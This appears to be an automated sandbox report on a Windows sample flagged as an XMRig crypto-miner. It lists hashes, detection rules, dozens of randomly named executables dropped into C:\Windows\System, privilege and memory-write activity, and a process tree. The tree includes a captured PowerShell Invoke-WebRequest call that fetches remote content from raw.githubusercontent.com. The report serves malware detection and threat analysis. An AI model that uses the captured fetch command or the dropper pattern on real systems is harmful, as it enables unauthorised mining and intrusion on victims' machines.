xmrig | 66aae540b365f2449ef3e6d0d3e840c605e46391a18174a8b2eae7bf83fbd65f

Analysis

max time kernel
129s
max time network
131s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
03/06/2024, 20:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
Size

3.2MB
MD5

50d2145c7ce2c9a3ae39ba68c3183770
SHA1

4421b2fc58263af69df33447cfb29c0a10d60b62
SHA256

66aae540b365f2449ef3e6d0d3e840c605e46391a18174a8b2eae7bf83fbd65f
SHA512

1b133e7724919deed2fdbb1475cc5bdb6e7ba3221ca1602609743c1d41df2df813a21f773356ae9a7560c8ed7c706053d972009611176aca230303f92ec396a2
SSDEEP

98304:S1ONtyBeSFkXV1etEKLlWUTOfeiRA2R76zHrWT:SbBeSFkX

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral2/memory/3436-0-0x00007FF61ABC0000-0x00007FF61AFB6000-memory.dmp	xmrig
behavioral2/files/0x0007000000023433-7.dat	xmrig
behavioral2/files/0x0007000000023432-8.dat	xmrig
behavioral2/files/0x0007000000023434-18.dat	xmrig
behavioral2/files/0x0007000000023435-29.dat	xmrig
behavioral2/files/0x0007000000023436-31.dat	xmrig
behavioral2/memory/3316-36-0x00007FF7445B0000-0x00007FF7449A6000-memory.dmp	xmrig
behavioral2/files/0x0007000000023437-37.dat	xmrig
behavioral2/memory/2060-51-0x00007FF6B94B0000-0x00007FF6B98A6000-memory.dmp	xmrig
behavioral2/memory/3724-69-0x00007FF6DEC30000-0x00007FF6DF026000-memory.dmp	xmrig
behavioral2/memory/396-75-0x00007FF61DC90000-0x00007FF61E086000-memory.dmp	xmrig
behavioral2/files/0x000700000002343c-73.dat	xmrig
behavioral2/files/0x0007000000023439-71.dat	xmrig
behavioral2/memory/3036-70-0x00007FF6B2750000-0x00007FF6B2B46000-memory.dmp	xmrig
behavioral2/memory/4888-66-0x00007FF7A90C0000-0x00007FF7A94B6000-memory.dmp	xmrig
behavioral2/files/0x0007000000023438-49.dat	xmrig
behavioral2/memory/3768-48-0x00007FF766FD0000-0x00007FF7673C6000-memory.dmp	xmrig
behavioral2/memory/3024-47-0x00007FF705080000-0x00007FF705476000-memory.dmp	xmrig
behavioral2/memory/436-43-0x00007FF672180000-0x00007FF672576000-memory.dmp	xmrig
behavioral2/files/0x000900000002342e-15.dat	xmrig
behavioral2/memory/1228-11-0x00007FF7FE170000-0x00007FF7FE566000-memory.dmp	xmrig
behavioral2/files/0x000700000002343d-107.dat	xmrig
behavioral2/files/0x000700000002344b-134.dat	xmrig
behavioral2/files/0x0007000000023444-124.dat	xmrig
behavioral2/memory/4568-142-0x00007FF734E00000-0x00007FF7351F6000-memory.dmp	xmrig
behavioral2/memory/1948-166-0x00007FF72A370000-0x00007FF72A766000-memory.dmp	xmrig
behavioral2/files/0x0007000000023455-178.dat	xmrig
behavioral2/files/0x0007000000023457-199.dat	xmrig
behavioral2/files/0x0007000000023462-224.dat	xmrig
behavioral2/files/0x0007000000023464-246.dat	xmrig
behavioral2/files/0x000700000002346c-286.dat	xmrig
behavioral2/files/0x000700000002346a-284.dat	xmrig
behavioral2/files/0x000700000002347b-313.dat	xmrig
behavioral2/files/0x000700000002347c-331.dat	xmrig
behavioral2/files/0x000700000002347f-330.dat	xmrig
behavioral2/memory/2324-362-0x00007FF79D8D0000-0x00007FF79DCC6000-memory.dmp	xmrig
behavioral2/memory/1172-376-0x00007FF738DC0000-0x00007FF7391B6000-memory.dmp	xmrig
behavioral2/memory/3312-386-0x00007FF756790000-0x00007FF756B86000-memory.dmp	xmrig
behavioral2/memory/3252-387-0x00007FF6B2C70000-0x00007FF6B3066000-memory.dmp	xmrig
behavioral2/memory/4028-385-0x00007FF6E9780000-0x00007FF6E9B76000-memory.dmp	xmrig
behavioral2/memory/4048-381-0x00007FF757560000-0x00007FF757956000-memory.dmp	xmrig
behavioral2/memory/64-380-0x00007FF7B45F0000-0x00007FF7B49E6000-memory.dmp	xmrig
behavioral2/memory/2212-367-0x00007FF7BE2C0000-0x00007FF7BE6B6000-memory.dmp	xmrig
behavioral2/files/0x000700000002347d-329.dat	xmrig
behavioral2/files/0x0007000000023470-309.dat	xmrig
behavioral2/files/0x0007000000023467-282.dat	xmrig
behavioral2/files/0x0007000000023463-273.dat	xmrig
behavioral2/files/0x0007000000023460-270.dat	xmrig
behavioral2/memory/4868-256-0x00007FF75EDA0000-0x00007FF75F196000-memory.dmp	xmrig
behavioral2/files/0x000700000002345b-244.dat	xmrig
behavioral2/files/0x000700000002345d-234.dat	xmrig
behavioral2/files/0x0007000000023459-226.dat	xmrig
behavioral2/memory/384-225-0x00007FF6F2160000-0x00007FF6F2556000-memory.dmp	xmrig
behavioral2/memory/4832-207-0x00007FF723FE0000-0x00007FF7243D6000-memory.dmp	xmrig
behavioral2/files/0x000700000002344e-206.dat	xmrig
behavioral2/files/0x0007000000023450-205.dat	xmrig
behavioral2/memory/1032-180-0x00007FF6A8BA0000-0x00007FF6A8F96000-memory.dmp	xmrig
behavioral2/files/0x0007000000023448-150.dat	xmrig
behavioral2/memory/3436-1796-0x00007FF61ABC0000-0x00007FF61AFB6000-memory.dmp	xmrig
behavioral2/memory/1228-1800-0x00007FF7FE170000-0x00007FF7FE566000-memory.dmp	xmrig
behavioral2/memory/3036-2050-0x00007FF6B2750000-0x00007FF6B2B46000-memory.dmp	xmrig
behavioral2/memory/396-2051-0x00007FF61DC90000-0x00007FF61E086000-memory.dmp	xmrig
behavioral2/memory/1948-2053-0x00007FF72A370000-0x00007FF72A766000-memory.dmp	xmrig
behavioral2/memory/4568-2052-0x00007FF734E00000-0x00007FF7351F6000-memory.dmp	xmrig

Blocklisted process makes network request 8 IoCs

flow	pid	Process
7	756	powershell.exe
9	756	powershell.exe
11	756	powershell.exe
12	756	powershell.exe
14	756	powershell.exe
23	756	powershell.exe
24	756	powershell.exe
27	756	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
756	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
1228	kdKNXSe.exe
3768	LSAEvyz.exe
2060	qEpTFtT.exe
3316	BdHKuTt.exe
436	faOBgtu.exe
3024	BLxPEeR.exe
4888	kWWNUPP.exe
3724	jJlDEJt.exe
396	MwDNGYR.exe
3036	KgIWbMp.exe
4568	WbQYbiH.exe
1032	REIupsg.exe
1948	jTkZOPW.exe
4832	ALtkyJZ.exe
384	KpBVsmm.exe
4048	QeZxRqk.exe
4868	UGvfyeL.exe
4028	kvzFOjb.exe
2324	DSyHoEn.exe
2212	sOHMhHM.exe
3312	wvpPtjy.exe
1172	MqFMztZ.exe
64	eEyVDeU.exe
3252	dZaPHGq.exe
1668	UTPglcc.exe
5080	mKRsDSk.exe
628	MAGZvbD.exe
4452	rcMPVbM.exe
4720	WWATppl.exe
3960	xRWykvd.exe
3964	TRGYyJi.exe
4536	zcKSpZw.exe
3120	OYpWZNt.exe
3532	gmbFRsU.exe
2464	rDfCGyE.exe
4472	YViBCHS.exe
428	LorwJwK.exe
2008	fKtcLkP.exe
2288	ngKmbBM.exe
976	DfBLxdU.exe
3000	QJWPpbJ.exe
4884	aCxYrhi.exe
5020	iKQHbAk.exe
1364	ZWMohQQ.exe
4948	aDXoyqI.exe
1636	lNRQLXi.exe
3444	tqRfDer.exe
2192	hSLfslE.exe
2536	NFPeYRO.exe
4556	ZnFhJts.exe
4712	YJYMAic.exe
2088	hFFVKaw.exe
3660	MzFEZqN.exe
3448	ojQyEAf.exe
3604	hqzMHNt.exe
3152	hXKWzqY.exe
3300	ESohjZh.exe
4788	LoNRtOG.exe
4768	XYinnyd.exe
1120	UOnTDfL.exe
1632	RWXBmAj.exe
2844	mOHptDr.exe
4372	AVzIQhk.exe
1292	TyMqEVu.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3436-0-0x00007FF61ABC0000-0x00007FF61AFB6000-memory.dmp	upx
behavioral2/files/0x0007000000023433-7.dat	upx
behavioral2/files/0x0007000000023432-8.dat	upx
behavioral2/files/0x0007000000023434-18.dat	upx
behavioral2/files/0x0007000000023435-29.dat	upx
behavioral2/files/0x0007000000023436-31.dat	upx
behavioral2/memory/3316-36-0x00007FF7445B0000-0x00007FF7449A6000-memory.dmp	upx
behavioral2/files/0x0007000000023437-37.dat	upx
behavioral2/memory/2060-51-0x00007FF6B94B0000-0x00007FF6B98A6000-memory.dmp	upx
behavioral2/memory/3724-69-0x00007FF6DEC30000-0x00007FF6DF026000-memory.dmp	upx
behavioral2/memory/396-75-0x00007FF61DC90000-0x00007FF61E086000-memory.dmp	upx
behavioral2/files/0x000700000002343c-73.dat	upx
behavioral2/files/0x0007000000023439-71.dat	upx
behavioral2/memory/3036-70-0x00007FF6B2750000-0x00007FF6B2B46000-memory.dmp	upx
behavioral2/memory/4888-66-0x00007FF7A90C0000-0x00007FF7A94B6000-memory.dmp	upx
behavioral2/files/0x0007000000023438-49.dat	upx
behavioral2/memory/3768-48-0x00007FF766FD0000-0x00007FF7673C6000-memory.dmp	upx
behavioral2/memory/3024-47-0x00007FF705080000-0x00007FF705476000-memory.dmp	upx
behavioral2/memory/436-43-0x00007FF672180000-0x00007FF672576000-memory.dmp	upx
behavioral2/files/0x000900000002342e-15.dat	upx
behavioral2/memory/1228-11-0x00007FF7FE170000-0x00007FF7FE566000-memory.dmp	upx
behavioral2/files/0x000700000002343d-107.dat	upx
behavioral2/files/0x000700000002344b-134.dat	upx
behavioral2/files/0x0007000000023444-124.dat	upx
behavioral2/memory/4568-142-0x00007FF734E00000-0x00007FF7351F6000-memory.dmp	upx
behavioral2/memory/1948-166-0x00007FF72A370000-0x00007FF72A766000-memory.dmp	upx
behavioral2/files/0x0007000000023455-178.dat	upx
behavioral2/files/0x0007000000023457-199.dat	upx
behavioral2/files/0x0007000000023462-224.dat	upx
behavioral2/files/0x0007000000023464-246.dat	upx
behavioral2/files/0x000700000002346c-286.dat	upx
behavioral2/files/0x000700000002346a-284.dat	upx
behavioral2/files/0x000700000002347b-313.dat	upx
behavioral2/files/0x000700000002347c-331.dat	upx
behavioral2/files/0x000700000002347f-330.dat	upx
behavioral2/memory/2324-362-0x00007FF79D8D0000-0x00007FF79DCC6000-memory.dmp	upx
behavioral2/memory/1172-376-0x00007FF738DC0000-0x00007FF7391B6000-memory.dmp	upx
behavioral2/memory/3312-386-0x00007FF756790000-0x00007FF756B86000-memory.dmp	upx
behavioral2/memory/3252-387-0x00007FF6B2C70000-0x00007FF6B3066000-memory.dmp	upx
behavioral2/memory/4028-385-0x00007FF6E9780000-0x00007FF6E9B76000-memory.dmp	upx
behavioral2/memory/4048-381-0x00007FF757560000-0x00007FF757956000-memory.dmp	upx
behavioral2/memory/64-380-0x00007FF7B45F0000-0x00007FF7B49E6000-memory.dmp	upx
behavioral2/memory/2212-367-0x00007FF7BE2C0000-0x00007FF7BE6B6000-memory.dmp	upx
behavioral2/files/0x000700000002347d-329.dat	upx
behavioral2/files/0x0007000000023470-309.dat	upx
behavioral2/files/0x0007000000023467-282.dat	upx
behavioral2/files/0x0007000000023463-273.dat	upx
behavioral2/files/0x0007000000023460-270.dat	upx
behavioral2/memory/4868-256-0x00007FF75EDA0000-0x00007FF75F196000-memory.dmp	upx
behavioral2/files/0x000700000002345b-244.dat	upx
behavioral2/files/0x000700000002345d-234.dat	upx
behavioral2/files/0x0007000000023459-226.dat	upx
behavioral2/memory/384-225-0x00007FF6F2160000-0x00007FF6F2556000-memory.dmp	upx
behavioral2/memory/4832-207-0x00007FF723FE0000-0x00007FF7243D6000-memory.dmp	upx
behavioral2/files/0x000700000002344e-206.dat	upx
behavioral2/files/0x0007000000023450-205.dat	upx
behavioral2/memory/1032-180-0x00007FF6A8BA0000-0x00007FF6A8F96000-memory.dmp	upx
behavioral2/files/0x0007000000023448-150.dat	upx
behavioral2/memory/3436-1796-0x00007FF61ABC0000-0x00007FF61AFB6000-memory.dmp	upx
behavioral2/memory/1228-1800-0x00007FF7FE170000-0x00007FF7FE566000-memory.dmp	upx
behavioral2/memory/3036-2050-0x00007FF6B2750000-0x00007FF6B2B46000-memory.dmp	upx
behavioral2/memory/396-2051-0x00007FF61DC90000-0x00007FF61E086000-memory.dmp	upx
behavioral2/memory/1948-2053-0x00007FF72A370000-0x00007FF72A766000-memory.dmp	upx
behavioral2/memory/4568-2052-0x00007FF734E00000-0x00007FF7351F6000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
6	raw.githubusercontent.com
7	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\rnZMMyv.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\VwaKCTv.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\MzFEZqN.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\zXHAoJW.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\ubANGqu.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\cSmQdXl.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\PbfnnYm.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\tqRfDer.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\fKtcLkP.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\QYnJmoa.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\rcMPVbM.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\LWmkonr.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\qGktEQM.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\zvyTbGh.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\kWWNUPP.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\KkfBOKI.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\CnAQkeX.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\QnbjxGP.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\AeYqHfQ.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\zcxTVxZ.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\ZtZWgTC.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\FusPVHH.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\dfYDMni.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\vDQtwVW.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\bGrCBIo.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\sOHMhHM.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\jvMMGtZ.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\NtYYLQX.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\XYinnyd.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\NBfyOgS.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\NPYQDMm.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\ihZuvjy.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\ulUzOdc.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\EYBJeFe.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\eKtMifm.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\UQiNnPi.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\bUtsyTD.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\EGJQFgP.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\vgrpsvm.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\lbJpKmE.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\RmTObbm.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\jMcKvKe.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\LznigNs.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\GduYSun.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\ESohjZh.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\ldQfTwe.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\SYmhnOM.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\OGZeZTM.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\OtRznkf.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\dBYaOuO.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\yzaMIGO.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\NFPeYRO.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\hyzeXvi.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\YNCFmED.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\ettXheu.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\zAaXxcT.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\XtpzbXl.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\PGNDbHm.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\MfNMSVB.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\nwBSNAF.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\gBQVGaj.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\KmMaTPv.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\GOfoRQt.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
File created	C:\Windows\System\DxQQwDt.exe	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
756	powershell.exe
756	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
Token: SeLockMemoryPrivilege	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
Token: SeDebugPrivilege	756	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3436 wrote to memory of 756	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	83
PID 3436 wrote to memory of 756	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	83
PID 3436 wrote to memory of 1228	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	84
PID 3436 wrote to memory of 1228	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	84
PID 3436 wrote to memory of 3768	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	85
PID 3436 wrote to memory of 3768	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	85
PID 3436 wrote to memory of 2060	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	86
PID 3436 wrote to memory of 2060	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	86
PID 3436 wrote to memory of 3316	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	87
PID 3436 wrote to memory of 3316	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	87
PID 3436 wrote to memory of 436	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	88
PID 3436 wrote to memory of 436	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	88
PID 3436 wrote to memory of 3024	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	89
PID 3436 wrote to memory of 3024	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	89
PID 3436 wrote to memory of 4888	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	90
PID 3436 wrote to memory of 4888	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	90
PID 3436 wrote to memory of 3724	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	91
PID 3436 wrote to memory of 3724	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	91
PID 3436 wrote to memory of 396	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	92
PID 3436 wrote to memory of 396	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	92
PID 3436 wrote to memory of 3036	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	93
PID 3436 wrote to memory of 3036	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	93
PID 3436 wrote to memory of 4568	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	94
PID 3436 wrote to memory of 4568	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	94
PID 3436 wrote to memory of 1032	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	95
PID 3436 wrote to memory of 1032	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	95
PID 3436 wrote to memory of 1948	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	96
PID 3436 wrote to memory of 1948	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	96
PID 3436 wrote to memory of 4832	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	97
PID 3436 wrote to memory of 4832	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	97
PID 3436 wrote to memory of 384	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	98
PID 3436 wrote to memory of 384	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	98
PID 3436 wrote to memory of 4048	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	99
PID 3436 wrote to memory of 4048	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	99
PID 3436 wrote to memory of 4868	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	100
PID 3436 wrote to memory of 4868	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	100
PID 3436 wrote to memory of 4028	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	101
PID 3436 wrote to memory of 4028	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	101
PID 3436 wrote to memory of 2324	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	102
PID 3436 wrote to memory of 2324	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	102
PID 3436 wrote to memory of 2212	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	103
PID 3436 wrote to memory of 2212	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	103
PID 3436 wrote to memory of 3312	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	104
PID 3436 wrote to memory of 3312	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	104
PID 3436 wrote to memory of 1172	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	105
PID 3436 wrote to memory of 1172	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	105
PID 3436 wrote to memory of 64	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	106
PID 3436 wrote to memory of 64	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	106
PID 3436 wrote to memory of 3252	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	107
PID 3436 wrote to memory of 3252	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	107
PID 3436 wrote to memory of 1668	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	108
PID 3436 wrote to memory of 1668	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	108
PID 3436 wrote to memory of 5080	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	109
PID 3436 wrote to memory of 5080	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	109
PID 3436 wrote to memory of 628	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	110
PID 3436 wrote to memory of 628	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	110
PID 3436 wrote to memory of 4452	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	111
PID 3436 wrote to memory of 4452	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	111
PID 3436 wrote to memory of 4720	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	112
PID 3436 wrote to memory of 4720	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	112
PID 3436 wrote to memory of 3960	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	113
PID 3436 wrote to memory of 3960	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	113
PID 3436 wrote to memory of 3964	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	114
PID 3436 wrote to memory of 3964	3436	50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe	114

C:\Users\Admin\AppData\Local\Temp\50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\50d2145c7ce2c9a3ae39ba68c3183770_NeikiAnalytics.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3436
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:756
- C:\Windows\System\kdKNXSe.exe
  C:\Windows\System\kdKNXSe.exe
  2⤵
  - Executes dropped EXE
  PID:1228
- C:\Windows\System\LSAEvyz.exe
  C:\Windows\System\LSAEvyz.exe
  2⤵
  - Executes dropped EXE
  PID:3768
- C:\Windows\System\qEpTFtT.exe
  C:\Windows\System\qEpTFtT.exe
  2⤵
  - Executes dropped EXE
  PID:2060
